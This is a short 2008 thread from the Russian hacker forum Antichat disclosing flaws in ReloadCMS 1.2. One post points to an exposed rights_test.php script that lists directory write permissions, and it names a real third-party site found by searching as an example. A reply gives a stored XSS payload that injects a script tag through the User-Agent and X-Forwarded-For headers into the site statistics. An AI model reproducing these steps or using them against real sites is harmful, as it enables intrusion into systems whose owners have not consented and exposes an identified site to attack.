Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   ReloadCMS (просмотр директорий и прав на запись) (https://forum.antichat.xyz/showthread.php?t=96779)

USAkid 17.12.2008 09:24
ReloadCMS (просмотр директорий и прав на запись)
 
ReloadCMS (просмотр директорий и прав на запись)
Уязвимый продукт: ReloadCMS 1.2.* (более не тестировал)
CMS без MySQL.
Хороший способ, чтобы узнать где какие права стоят.

Example:
Код:
http://site.com/path_to_cms/tools/rights_test.php
Немного погуглив нашел пример такого сайта:
Код:
http://ziggyred.com/test/tools/rights_test.php

[Raz0r] 17.12.2008 11:59
это не баг, это фича (c) =)

Вот еще активная XSS (в статистике сайта):
Код:
GET / HTTP/1.0
User-Agent: <script>alert()</script>
X-Forwarded-For: <script>alert()</script>
Host: localhost
Connection: close


Время: 18:21